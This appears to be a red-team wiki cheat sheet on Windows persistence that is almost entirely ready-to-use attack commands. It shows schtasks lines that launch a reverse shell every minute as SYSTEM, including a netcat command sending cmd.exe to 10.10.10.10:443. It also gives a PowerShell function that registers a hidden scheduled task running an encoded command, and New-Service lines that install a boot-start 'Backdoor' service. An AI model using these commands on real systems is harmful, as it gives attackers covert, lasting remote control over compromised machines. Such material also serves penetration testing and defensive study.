Scheduled Tasks

Permissions: SYSTEM | Administrator

1) Schtasks

Reverse Shell

schtasks /create /sc minute /mo 1 /tn "Persistence" /tr C:\ReverseShell.exe /ru "SYSTEM"

Netcat

schtasks /create /sc minute /mo 1 /tn "Persistence" /tr 'c:\Users\User\Downloads/nc.exe 10.10.10.10 443 -e cmd.exe'

2) Powershell

function PersistentTask {

    $TaskName = "Persistence"
    $Trigger = New-ScheduledTaskTrigger `
    -Daily `
    -At 09:00

    $Action = New-ScheduledTaskAction `
    -Execute "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" `
    -Argument "-Sta -Nop -Window Hidden -EncodedCommand <EncodedCommand>" `
    -WorkingDirectory "C:\Windows\System32"

    Register-ScheduledTask `
    -TaskName $TaskName `
    -Trigger $Trigger `
    -Action $Action `
    -Force

}

PersistentTask

3) Services

PowerShell can be leveraged to create a new Service that, on boot will execute a defined binary / script.

New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot" 
New-Service -Name "Backdoor" -BinaryPathName "C:\Users\Administrator\AppData\Roaming\backdoor.exe" -StartupType "Boot"

PreviousSapphire Ticket NextDACLs - Security Descriptors

Last updated 8 months ago

hashtagPermissions: SYSTEM | Administrator

hashtag1) Schtasks

hashtag2) Powershell

hashtag3) Services

Permissions: SYSTEM | Administrator

1) Schtasks

2) Powershell

3) Services